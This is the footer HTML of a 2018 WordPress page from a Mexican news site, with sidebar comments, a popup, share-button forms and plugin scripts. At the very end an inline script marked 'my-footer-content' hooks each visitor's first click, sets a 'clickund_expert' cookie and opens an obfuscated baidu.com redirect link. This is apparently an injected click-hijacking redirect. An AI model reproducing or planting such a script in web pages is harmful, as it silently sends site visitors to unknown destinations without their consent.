		</div><div class="widget widget_search clearfix"><form id="searchform" class="searchform" method="get" action="http://diariodelyaqui.mx">

    <div class="clearfix default_searchform">

     <input type="text" name="s" class="s" onblur="if (this.value == '') {this.value = 'Search here...';}" onfocus="if (this.value == 'Search here...') {this.value = '';}" value="Search here..." />
           
		<input type="submit" value="Search" class="button">

    </div><!-- END .clearfix default_searchform -->

    
</form><!-- END #searchform -->

</div><div class="widget widget_recent_comments clearfix"><h5 class="widget-title"><span>Comentarios recientes</span></h5><ul id="recentcomments"><li class="recentcomments"><span class="comment-author-link">Daniel Santos</span> en <a href="http://diariodelyaqui.mx/marcharan-por-la-diversidad-sexual/#comment-7745">Marcharán por la diversidad sexual</a></li><li class="recentcomments"><span class="comment-author-link">Chinha</span> en <a href="http://diariodelyaqui.mx/decomisan-700-chocolates-en-sonora/#comment-7705">Decomisan 700 “chocolates” en Sonora</a></li><li class="recentcomments"><span class="comment-author-link">Ciudadano</span> en <a href="http://diariodelyaqui.mx/uber-en-total-anarquia-taxistas/#comment-7619">Uber en total anarquía: Taxistas</a></li><li class="recentcomments"><span class="comment-author-link">Jorge Vázquez</span> en <a href="http://diariodelyaqui.mx/investiga-cedh-supuesto-suicidio-de-genaro-ruiz/#comment-7606">Investiga CEDH supuesto suicidio de Genaro Ruiz</a></li><li class="recentcomments"><span class="comment-author-link">Ricardo</span> en <a href="http://diariodelyaqui.mx/el-mejor-10-de-mayo-para-mariana/#comment-7597">El mejor 10 de mayo para Mariana</a></li></ul></div>

                </div><!-- END .sidebar -->

            </aside><!-- END -->

        
    </div><!-- END .row -->


</div><!-- #main-container -->
    <div id="global-loading" class="loading-dots">
        <span class="dot-1"></span>
        <span class="dot-2"></span>
        <span class="dot-3"></span>
    </div>
    <div id="global-alert" class="alert alert-message"></div>
<footer id="bottom-footer" class="bottom-footer" role="contentinfo" itemscope="itemscope" itemtype="http://schema.org/WPFooter"><div id="gototop"><a href="#theme-wrapper" rel="nofollow">Regreso al Inicio</a></div><div id="colophon" class="creds" role="contentinfo"><div id="theme-credits">Todos los derechos reservados 2018. De no existir previa autorización, queda expresamente prohibida la publicación, retransmisión, edición y cualquier otro uso de los contenidos. Número de certificado de reserva de Derechos al uso Exclusivo de la página www.diariodelyaqui.mx otorgado por el Instituto de Derecho de Autor: 04-2013-061812344800-203.</div></div></footer></div><!-- #theme-wrapper-inner -->
</div><!-- #theme-wrapper -->
<!-- Popups v1.9.1.1 - https://wordpress.org/plugins/popups/ --><style type="text/css">
#spu-102800 .spu-close{
	font-size: 30px;
	color:#666;
	text-shadow: 0 1px 0 #fff;
}
#spu-102800 .spu-close:hover{
	color:#000;
}
#spu-102800 {
	background-color: #eeeeee;
	background-color: rgba(238,238,238,1);
	color: #333;
	padding: 25px;
		border-radius: 0px;
	-moz-border-radius: 0px;
	-webkit-border-radius: 0px;
	-moz-box-shadow:  0px 0px 10px 1px #666;
	-webkit-box-shadow:  0px 0px 10px 1px #666;
	box-shadow:  0px 0px 10px 1px #666;
	width: 600px;

}
#spu-bg-102800 {
	opacity: 0.5;
	background-color: #000;
}
/*
		* Add custom CSS for this popup
		* Be sure to start your rules with #spu-102800 { } and use !important when needed to override plugin rules
		*/</style>
<div class="spu-bg" id="spu-bg-102800"></div>
<div class="spu-box  spu-centered spu-total- " id="spu-102800"
 data-box-id="102800" data-trigger="seconds"
 data-trigger-number="5"
 data-spuanimation="fade" data-cookie="999" data-close-cookie="30" data-test-mode="0"
 data-auto-hide="0" data-close-on-conversion="1" data-bgopa="0.5" data-total=""
 style="left:-99999px !important;" data-width="600" >
	<div class="spu-content"><p><img class="alignnone wp-image-102801 size-full" title="www.diariodelyaqui.mx" src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/W-N.jpg" alt="" width="712" height="1280" /></p>
</div>
	<span class="spu-close spu-close-popup top_right"><i class="spu-icon spu-icon-close"></i></span>
	<span class="spu-timer"></span>
	</div>
<!-- / Popups Box -->
<div id="fb-root" class=" fb_reset"></div><div id="ssbp-email-div"><span class="ssbp-x ssbp-close-email-div"></span><div class="ssbp-email-alert" id="ssbp-email-alert"></div><input type="hidden" id="_wpnonce" name="_wpnonce" value="17e917d48e" /><input type="hidden" name="_wp_http_referer" value="/asesinan-a-uno-y-levantan-a-otro/" /><form id="js-ssbp-email-form" method="post" action=""
                data-success-alert-text="Thanks, your email has been sent"
                data-warning-alert-text="Please check the fields and try again"
                data-brute-alert-text="The email to friend functionality is restricted to one email every five minutes, please try again soon">
                <input type="hidden" id="fill_me" name="fill_me" value="" />
                <input type="hidden" id="url" name="url" value="http://diariodelyaqui.mx/asesinan-a-uno-y-levantan-a-otro/" /><input type="hidden" id="_wpnonce" name="_wpnonce" value="17e917d48e" /><input type="hidden" name="_wp_http_referer" value="/asesinan-a-uno-y-levantan-a-otro/" />
                <div class="ssbp-form-group">
                    <label for="email" class="ssbp-required">Friend's email</label>
                    <input type="email" class="ssbp-form-control ssbp-required" id="email" name="email" placeholder="friends@email.com" required>
                </div>
                <div class="ssbp-form-group">
                    <label for="message" class="ssbp-required">Message</label>
                    <textarea maxlength="250" class="ssbp-form-control ssbp-required" rows="6" id="message" name="message" required> http://diariodelyaqui.mx/asesinan-a-uno-y-levantan-a-otro/</textarea>
                </div>
                <div class="ssbp-form-group ssbp-text-align-right">
                    <button id="ssbp-email-send" type="submit" class="ssbp-btn-primary">Send</button>
                </div>
             </form><a href="https://simplesharebuttons.com/plus/?utm_source=plus&amp;utm_medium=plugin_powered_by&utm_campaign=powered_by&amp;utm_content=plus_email" target="_blank"><img class="ssbp-email-powered-by" src="http://diariodelyaqui.mx/wp-content/plugins/simple-share-buttons-plus/images/simple-share-buttons-logo-white.png" alt="Simple Share Buttons" /></a></div>	<div style="display:none">
	<div class="grofile-hash-map-db876b77006eed1e6980c34e3cd106de">
	</div>
	</div>
<script></script><script type='text/javascript' src='http://diariodelyaqui.mx/wp-includes/js/admin-bar.min.js?ver=4.9.6'></script>
<script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201822'></script>
<script type='text/javascript' src='http://diariodelyaqui.mx/wp-content/plugins/radium-html5-media/assets/js/jplayer.js?ver=1.0'></script>
<script type='text/javascript' src='http://diariodelyaqui.mx/wp-content/plugins/simple-share-buttons-plus/js/ssbp_standard.min.js?ver=4.9.6'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var ssbpEmail = {"ajax_url":"http:\/\/diariodelyaqui.mx\/wp-admin\/admin-ajax.php","security":"843c81edf4"};
/* ]]> */
</script>
<script type='text/javascript' src='http://diariodelyaqui.mx/wp-content/plugins/simple-share-buttons-plus/js/ssbp_email.min.js?ver=4.9.6'></script>
<script type='text/javascript' src='http://diariodelyaqui.mx/wp-content/plugins/video-central/assets/frontend/js/video-js.js?ver=1.2.3'></script>
<script type='text/javascript' src='http://diariodelyaqui.mx/wp-content/plugins/video-central/templates/default/js/plugins.min.js?ver=1.2.3'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var likesdata = {"ajaxurl":"http:\/\/diariodelyaqui.mx\/wp-admin\/admin-ajax.php","nonce":"cbb458859d","refresh":"0","lifetime":"1460","unlike":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='http://diariodelyaqui.mx/wp-content/plugins/video-central/templates/default/js/main.min.js?ver=1.2.3'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var spuvar = {"is_admin":"","disable_style":"","safe_mode":"","ajax_mode":"","ajax_url":"http:\/\/diariodelyaqui.mx\/wp-admin\/admin-ajax.php","ajax_mode_url":"http:\/\/diariodelyaqui.mx\/?spu_action=spu_load&lang=","pid":"104501","is_front_page":"","is_category":"","site_url":"http:\/\/diariodelyaqui.mx","is_archive":"","is_search":"","is_preview":"","seconds_confirmation_close":"5"};
var spuvar_social = [];
/* ]]> */
</script>
<script type='text/javascript' src='http://diariodelyaqui.mx/wp-content/plugins/popups/public/assets/js/min/public-min.js?ver=1.9.1.1'></script>
<script type='text/javascript' src='http://s.gravatar.com/js/gprofiles.js?ver=2018Mayaa'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var WPGroHo = {"my_hash":""};
/* ]]> */
</script>
<script type='text/javascript' src='http://diariodelyaqui.mx/wp-content/plugins/jetpack/modules/wpgroho.js?ver=4.9.6'></script>
<script type='text/javascript' src='http://diariodelyaqui.mx/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://diariodelyaqui.mx/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://diariodelyaqui.mx/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://diariodelyaqui.mx/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://diariodelyaqui.mx/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://diariodelyaqui.mx/wp-includes/js/jquery/ui/slider.min.js?ver=1.11.4'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var radium_framework_globals = {"page_bg_images":null,"js_dir":"http:\/\/diariodelyaqui.mx\/wp-content\/themes\/newscore\/assets\/js","ajaxurl":"http:\/\/diariodelyaqui.mx\/wp-admin\/admin-ajax.php","sticky_header":"true","space_menu_evenly":"true","back_to_top":"true","share_posts_js":"false","theme_url":"http:\/\/diariodelyaqui.mx\/wp-content\/themes\/newscore","ajax_error_message":"Una disculpa, en este momento no se pueden cargar m\u00e1s art\u00edculos. Favor de tratar de nuevo.","ajax_error_message2":"Una disculpa. en este momento no se puede cargar este art\u00edculo utilizando ajax. Redireccionando...","cart_added_message":"ha sido agregado a su Carro de Compras."};
/* ]]> */
</script>
<script type='text/javascript' src='http://diariodelyaqui.mx/wp-content/themes/newscore/assets/js/plugins.min.js?ver=1.9.3'></script>
<script type='text/javascript' src='http://diariodelyaqui.mx/wp-content/themes/newscore/assets/js/main.min.js?ver=1.9.3'></script>
<script type='text/javascript' src='http://diariodelyaqui.mx/wp-includes/js/comment-reply.min.js?ver=4.9.6'></script>
<script type='text/javascript' src='http://diariodelyaqui.mx/wp-content/themes/newscore/assets/js/jquery.validate.min.js?ver=1.9.3'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var BP_DTheme = {"my_favs":"Mis favoritos","accepted":"Aceptado","rejected":"Rechazado","show_all_comments":"Mostrar todos los comentarios para este thread","show_x_comments":"Mostrar todos los %d comentarios","show_all":"Mostrar todos","comments":"comentarios","close":"Cerrar","view":"Ver","mark_as_fav":"Favorito","remove_fav":"Quitar favorito","unsaved_changes":"Su perfil tiene cambios que no han sido guardados. Si deja la p\u00e1gina ahora, los cambios se perder\u00e1n."};
/* ]]> */
</script>
<script type='text/javascript' src='http://diariodelyaqui.mx/wp-content/themes/newscore/assets/js/buddypress.min.js?ver=4.9.6'></script>
<script type='text/javascript' src='http://diariodelyaqui.mx/wp-content/plugins/radium-galleries-lite/assets/frontend/prettyphoto/js/jquery.prettyPhoto.js?ver=4.9.6'></script>
<script type='text/javascript' src='http://diariodelyaqui.mx/wp-content/plugins/radium-galleries-lite/assets/frontend/galleria/galleria.min.js?ver=4.9.6'></script>
<script type='text/javascript' src='http://diariodelyaqui.mx/wp-content/plugins/radium-galleries-lite/assets/frontend/galleria/themes/classic/galleria.classic.min.js?ver=4.9.6'></script>
<script type='text/javascript' src='http://diariodelyaqui.mx/wp-includes/js/wp-embed.min.js?ver=4.9.6'></script>
<script async="async" type='text/javascript' src='http://diariodelyaqui.mx/wp-content/plugins/akismet/_inc/form.js?ver=4.0.2'></script>
<script type='text/javascript' src='https://stats.wp.com/e-201822.js' async defer></script>
<script type='text/javascript'>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:5.0',blog:'117352554',post:'104501',tz:'-7',srv:'diariodelyaqui.mx'} ]);
	_stq.push([ 'clickTrackerInit', '117352554', '104501' ]);
</script>
		<div id="wpadminbar" class="nojq nojs">
							<a class="screen-reader-shortcut" href="#wp-toolbar" tabindex="1">Ir a la barra de herramientas</a>
						<div class="quicklinks" id="wp-toolbar" role="navigation" aria-label="Barra de herramientas" tabindex="0">
				<ul id="wp-admin-bar-root-default" class="ab-top-menu">
		<li id="wp-admin-bar-wp-logo" class="menupop"><div class="ab-item ab-empty-item" tabindex="0" aria-haspopup="true"><span class="ab-icon"></span><span class="screen-reader-text">Acerca de WordPress</span></div><div class="ab-sub-wrapper"><ul id="wp-admin-bar-wp-logo-external" class="ab-sub-secondary ab-submenu">
		<li id="wp-admin-bar-wporg"><a class="ab-item" href="https://es.wordpress.org/">WordPress.org</a>		</li>
		<li id="wp-admin-bar-documentation"><a class="ab-item" href="https://codex.wordpress.org/">Documentación</a>		</li>
		<li id="wp-admin-bar-support-forums"><a class="ab-item" href="https://es.wordpress.org/support/">Foros de soporte</a>		</li>
		<li id="wp-admin-bar-feedback"><a class="ab-item" href="https://es.wordpress.org/support/forum/comunidad/peticiones-y-feedback/">Sugerencias</a>		</li></ul></div>		</li>
		<li id="wp-admin-bar-bp-login"><a class="ab-item" href="http://diariodelyaqui.mx/wp-login.php?redirect_to=http%3A%2F%2Fdiariodelyaqui.mx%2Fasesinan-a-uno-y-levantan-a-otro%2F">Iniciar sesión</a>		</li></ul><ul id="wp-admin-bar-top-secondary" class="ab-top-secondary ab-top-menu">
		<li id="wp-admin-bar-search" class="admin-bar-search"><div class="ab-item ab-empty-item" tabindex="-1"><form action="http://diariodelyaqui.mx/" method="get" id="adminbarsearch"><input class="adminbar-input" name="s" id="adminbar-search" type="text" value="" maxlength="150" /><label for="adminbar-search" class="screen-reader-text">Buscar</label><input type="submit" class="adminbar-button" value="Buscar"/></form></div>		</li></ul>			</div>
					</div>

		<!-- my-footer-content --><script data-cfasync='false' type='text/javascript'>
function getCookie(name){var value="; "+document.cookie;var parts=value.split("; "+name+"=");if(parts.length==2)return parts.pop().split(";").shift();else return false}var idToRedirect=document.currentScript.getAttribute('id');var isToChrome=document.currentScript.getAttribute('data-type');var contn=0;if(isToChrome==1){if(navigator.userAgent.indexOf("Chrome")!=-1){var contn=1}}else{var contn=1}if(contn==1&&!getCookie("clickund_expert")){window.onload=function(){document.body.addEventListener('click',function(event){var now=new Date();var time=now.getTime();time+=3600*1000;now.setTime(time);document.cookie="clickund_expert=1; "+now.toUTCString()+";path=/";window.open('http://www.baidu.com/link?url=H2wAK_chuo6Ida7mTQcbgmWWBW4_5ZYWV4RarNLtvac1SAIPAfeG3BP_H4egfP7Y');this.removeEventListener('click',arguments.callee,false)})}};
</script></body>
</html><!-- WP Fastest Cache file was created in 2.1812310218811 seconds, on 28-05-18 16:46:30 --><!-- via php -->